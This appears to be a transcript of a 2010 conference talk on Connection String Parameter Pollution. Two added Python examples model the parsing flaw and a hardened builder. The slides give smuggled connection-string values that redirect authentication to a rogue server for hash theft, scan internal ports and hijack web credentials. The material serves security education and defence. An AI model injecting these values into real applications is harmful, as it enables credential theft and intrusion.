Connection String Parameter Pollution Attacks

Talk delivered by Chema Alonso and Jose Palazon "Palako" at BlackHat DC 2010 about Connection String Injection Parameter Pollution attacks.

  1. Chema Alonso & Palako
     Informática 64
  2. Connection Strings
     Define the way an application connects to a data repository.
     There are connection strings for:
       • Relational databases (MSSQL, Oracle, MySQL, ...)
       • LDAP directories
       • Files
       • Etc.
  3. Database Connection Strings
     Data Source = myServerAddress;
     Initial Catalog = myDataBase;
     User Id = myUsername;
     Password = myPassword;
  4. DB Connection Build-up
  5. Google Hacking
  6. Google Hacking
  7. UDL (Universal Data Link) Files
  8. How a Web App Connects to the DB
     Operating system accounts:
       Data Source = myServerAddress;
       Initial Catalog = myDataBase;
       User Id =;
       Password =;
       Integrated Security = SSPI/True/Yes;
     Database credentials:
       Data Source = myServerAddress;
       Initial Catalog = myDataBase;
       User Id = myUsername;
       Password = myPassword;
       Integrated Security = No;
  9. Users Authenticated by the Web App
     The web application manages the login process.
     1.- The web application connects to the database using its own credentials.
     2.- It asks the user for login information.
     3.- It checks the login information against the info stored in a custom users table.
     (Diagram: connection string, custom users table, "Select id from users", syslogins, database engine, app running on the web server)
  10. Users Authenticated by the Database
     The database engine manages the login process.
     1.- The web application asks for credentials.
     2.- A connection string is composed with those credentials to connect to the database.
     3.- Roles and permissions are limited by the user used in the connection string.
     (Diagram: syslogins, connection string, database engine, app running on the web server)
  11. Connection String Attacks
     It's possible to inject parameters into connection strings using semicolons as a separator:
     Data Source = myServerAddress;
     Initial Catalog = myDataBase;
     Integrated Security = NO;
     User Id = myUsername;
     Password = myPassword; Encryption = Off;
  12. ConnectionStringBuilder
     Available in .NET Framework 2.0
     Builds secure connection strings using parameters
     It's not possible to inject into the connection string
  13. Are people aware of this?
  14. Connection String Parameter Pollution
     The goal is to inject parameters into the connection string, whether they already exist or not.
     If a parameter is duplicated, the last value wins.
     This behavior allows attackers to completely overwrite the connection string, and therefore to manipulate how the application will work and how it will be authenticated.
  15. Pollutable Behavior
     Param1=Value A
     Param2=Value B
     Param1=Value C
     Param2=Value D
     (Diagram: DB connection object with Param1, Param2)
  16. What can be done with CSPP? Overwrite a parameter
     Data Source=DB1
     UID=sa
     Data Source=DB2
     password=Pwnd!
     (Diagram: DB connection object with Data Source, UID, password)
  17. Scanning the DMZ
     (Diagram: a web app vulnerable to CSPP behind the firewall reaches, through the Data Source parameter, the production database, development database 1, the financial database, the test database and a forgotten database)
  18. Port Scanning a Server
     (Diagram: Data Source set to DB1,80 / DB1,21 / DB1,25 / DB1,1445 from the vulnerable web app against the production database server behind the firewall)
  19. What can be done with CSPP? Add a parameter
     Data Source=DB1
     UID=sa
     Integrated Security=True
     password=Pwnd!
     (Diagram: DB connection object with Data Source, UID, password)
  20. CSPP Attack 1: Hash Stealing
     1.- Run a rogue server on an accessible IP address: Rogue_Server
     2.- Activate a sniffer to catch the login process: Cain/Wireshark
     3.- Overwrite the Data Source parameter: Data_Source=Rogue_Server
     4.- Force Windows Integrated Authentication: Integrated Security=true
  21. CSPP Attack 1: Hash Stealing
     Template:
     Data source = SQL2005; initial catalog = db1;
     Integrated Security=no; user id=+'User_Value'+;
     Password=+'Password_Value'+;
     After pollution:
     Data source = SQL2005; initial catalog = db1;
     Integrated Security=no; user id=;Data Source=Rogue_Server;
     Password=;Integrated Security=True;
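The following is an added example, not code from the talk or from Informática 64. It models the parsing behaviour slides 11, 14 and 16 describe (semicolon-separated pairs, last duplicate wins, keyword aliases such as `Server` folding onto `Data Source`) and feeds it the slide 21 template built by string concatenation, so a defender can see exactly which server and which authentication mode a polluted string resolves to. The alias table is a subset modelled on the documented SqlClient keywords and is an assumption; the sample user and password values are constructed.

```python
"""Model of ADO.NET-style connection string parsing, added here as an
illustration; not code from the talk or from Informática 64."""

# Keyword aliases that SqlClient folds onto one setting. Subset, from the
# documented SqlConnectionStringBuilder keywords; treat as an assumption.
_CANONICAL = {
    "data source": "Data Source", "server": "Data Source", "address": "Data Source",
    "addr": "Data Source", "network address": "Data Source",
    "initial catalog": "Initial Catalog", "database": "Initial Catalog",
    "user id": "User ID", "uid": "User ID", "user": "User ID",
    "password": "Password", "pwd": "Password",
    "integrated security": "Integrated Security",
    "trusted_connection": "Integrated Security",
}


def parse_connection_string(cs: str) -> dict:
    """Split 'key=value;' pairs. A repeated key overwrites the earlier value
    (slide 14: the last value wins), and aliases collapse onto one key, so
    'Server=' pollutes 'Data Source='. Quoted values keep their semicolons."""
    result, i, n = {}, 0, len(cs)
    while i < n:
        while i < n and cs[i] in " \t;":          # skip blanks and empty pairs
            i += 1
        if i >= n:
            break
        eq = cs.find("=", i)
        if eq == -1:
            raise ValueError(f"malformed segment: {cs[i:]!r}")
        key = cs[i:eq].strip().lower()
        i = eq + 1
        while i < n and cs[i] == " ":
            i += 1
        if i < n and cs[i] in "\"'":              # quoted value: ';' is literal
            quote, i, buf = cs[i], i + 1, []
            while True:
                if i >= n:
                    raise ValueError("unterminated quoted value")
                if cs[i] == quote:
                    if i + 1 < n and cs[i + 1] == quote:   # doubled quote = literal
                        buf.append(quote)
                        i += 2
                        continue
                    i += 1
                    break
                buf.append(cs[i])
                i += 1
            value = "".join(buf)
        else:                                     # bare value runs to next ';'
            end = cs.find(";", i)
            end = n if end == -1 else end
            value, i = cs[i:end].strip(), end
        result[_CANONICAL.get(key, key)] = value
    return result


def build_by_concatenation(user_value: str, password_value: str) -> str:
    """The vulnerable pattern from slide 21: user-controlled values glued into
    a fixed template with no quoting."""
    return ("Data source = SQL2005; initial catalog = db1; "
            "Integrated Security=no; user id=" + user_value + "; "
            "Password=" + password_value + ";")


def effective_target(cs: str) -> tuple:
    """Where a connection would really go and how it would authenticate:
    (server, integrated_auth_enabled, user id)."""
    cfg = parse_connection_string(cs)
    integrated = cfg.get("Integrated Security", "false").lower() in ("true", "yes", "sspi")
    return cfg.get("Data Source"), integrated, cfg.get("User ID")


if __name__ == "__main__":
    # Constructed inputs: an honest login and the pollution payloads shown on slide 21.
    honest = build_by_concatenation("webuser", "s3cret")
    polluted = build_by_concatenation(";Data Source=Rogue_Server", ";Integrated Security=True")
    print(effective_target(honest))    # ('SQL2005', False, 'webuser')
    print(effective_target(polluted))  # ('Rogue_Server', True, '')
```

`effective_target` is the check worth running in a code review or a test suite: if any caller-controlled string can change its first two results, the application has the pollution problem the slides describe, regardless of which database driver is behind it.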
  22. CSPP 1: ASP.NET Enterprise Manager
  23. CSPP Attack 2: Port Scanning
     1.- Duplicate the Data Source parameter, setting the target server and target port to be scanned: Data_Source=Target_Server,target_Port
     2.- Check the error messages:
         - No TCP connection -> port is closed
         - No SQL Server -> port is open
         - Invalid password -> SQL Server there!
  24. CSPP Attack 2: Port Scanning
     Template:
     Data source = SQL2005; initial catalog = db1;
     Integrated Security=no; user id=+'User_Value'+;
     Password=+'Password_Value'+;
     After pollution:
     Data source = SQL2005; initial catalog = db1;
     Integrated Security=no; user id= ;Data Source=Target_Server, Target_Port;
     Password=;Integrated Security=True;
  25. CSPP 2: myLittleAdmin
     Port is open
  26. CSPP 2: myLittleAdmin
     Port is closed
  27. CSPP Attack 3: Hijacking Web Credentials
     1.- Duplicate the Data Source parameter pointing to the target SQL Server: Data_Source=Target_Server
     2.- Force Windows Authentication: Integrated Security=true
     3.- The application pool in which the web app is running will send its credentials in order to log in to the database engine.
  28. CSPP Attack 3: Hijacking Web Credentials
     Template:
     Data source = SQL2005; initial catalog = db1;
     Integrated Security=no; user id=+'User_Value'+;
     Password=+'Password_Value'+;
     After pollution:
     Data source = SQL2005; initial catalog = db1;
     Integrated Security=no; user id=;Data Source=Target_Server;
     Password=;Integrated Security=true;
  29. CSPP Attack 3: Web Data Administrator
  30. CSPP Attack 3: myLittleAdmin/myLittleBackup
  31. CSPP Attack 3: ASP.NET Enterprise Manager
  32. Other Databases
     MySQL
       • Does not support integrated security
       • It's still possible to manipulate the behavior of the web application: port scanning, connecting to internal/testing/development databases, stealing credentials
     Oracle
       • Supports integrated authentication running on Windows and UNIX/Linux servers
       • It's possible to perform all the described attacks: hash stealing, port scanning, hijacking web credentials
       • It's also possible to elevate a connection to sysdba in order to shut down/start up an instance
  33. Demo
  34. Scanner
     Proof of concept to test your network
     Tries a hijacking web credentials attack
     Written in ASP.NET C#
     Free download (code included, of course)
     http://www.informatica64.com/csppScanner.aspx
  35. CSPP Scanner
  36. Scanner CSPP: Attacks
  37. Demo
  38. myLittleAdmin/myLittleBackup
     myLittleTools released a security advisory and a patch about this
  39. ASP.NET Enterprise Manager
     ASP.NET Enterprise Manager is "abandoned", but it's still being used in a lot of web control panels.
     Fix the code yourself
  40. ASP.NET Enterprise Manager
  41. ASP.NET Web Data Administrator
     ASP.NET Web Data Administrator is secure on the CodePlex web site, but not on the Microsoft web site, where an insecure old version was published.
  42. Countermeasures
     Harden your firewall (outbound connections)
     Review your internal accounts policy: web application, web server, database engine
     Use ConnectionStringBuilder
     Filter the ;)
  43. Questions?
     Contact
     Chema Alonso
     chema@informatica64.com
     http://www.informatica64.com
     http://elladodelmal.blogspot.com
     http://twitter.com/chemaalonso
     José Palazón "Palako"
     palako@lateatral.com
     Authors
     Chema Alonso
     Manuel Fernández "The Sur"
     Alejandro Martín Bailón
     Antonio Guzmán
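As an added example for the countermeasures on slides 12 and 42 (use a connection string builder, filter the semicolon), the code below is the hardened counterpart of the concatenation template on slide 21. It is not .NET's SqlConnectionStringBuilder or any code from the talk; it models what such a builder does, namely setting each keyword exactly once and quoting any value that contains a separator or a quote, and adds the input filter as a second layer. The fixed server and database names, and the payload strings, are constructed for the demonstration.

```python
"""Hardened counterpart of the concatenation on slide 21, added as an
illustration of the countermeasures on slides 12 and 42. It models what a
connection string builder does (quote values) and is not .NET's own code."""

# Characters the input filter rejects outright: separator, both quote styles,
# and control characters (assumption: credentials never legitimately need them).
_FORBIDDEN = set(';"\'') | {chr(c) for c in range(32)}


def quote_value(value: str) -> str:
    """Builder-style quoting: a value that contains a separator, a quote or
    edge whitespace is wrapped in double quotes, with inner '"' doubled, so a
    quote-aware parser keeps the whole thing inside one setting."""
    needs_quotes = (value != value.strip()) or any(c in value for c in ';"\'')
    if not needs_quotes:
        return value
    return '"' + value.replace('"', '""') + '"'


def build_with_builder(server: str, database: str, user: str, pwd: str) -> str:
    """Every setting is emitted exactly once from a fixed key; caller data
    only ever lands in a value, and values are quoted. There is no way for
    the user or password to introduce a second Data Source or to switch
    Integrated Security on."""
    parts = [("Data Source", server), ("Initial Catalog", database),
             ("Integrated Security", "False"), ("User ID", user), ("Password", pwd)]
    return ";".join(f"{k}={quote_value(v)}" for k, v in parts)


def validate_credential_input(value: str, max_len: int = 128) -> str:
    """Slide 42's 'filter the ;' as defence in depth: reject separators, quote
    characters and control characters before any string is built at all."""
    if len(value) > max_len or any(c in _FORBIDDEN for c in value):
        raise ValueError("credential contains characters not allowed in a connection string")
    return value


def login_connection_string(user: str, pwd: str) -> str:
    """Both layers together: validate first, then build with quoting.
    Server and database names are fixed by the application, never by input
    (constructed values for the example)."""
    return build_with_builder("SQL2005", "db1",
                              validate_credential_input(user),
                              validate_credential_input(pwd))


if __name__ == "__main__":
    # Constructed payloads from slide 21 stay inside the User ID / Password values.
    print(build_with_builder("SQL2005", "db1",
                             ";Data Source=Rogue_Server", ";Integrated Security=True"))
    try:
        login_connection_string(";Data Source=Rogue_Server", "x")
    except ValueError as e:
        print("rejected:", e)
```

The builder alone already defeats the pollution, because the payload ends up as the literal text of the User ID value rather than as new keywords; the filter is there for the "review your internal accounts policy" part of slide 42, since a credential containing a semicolon is a strong signal of probing and is worth logging as such.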
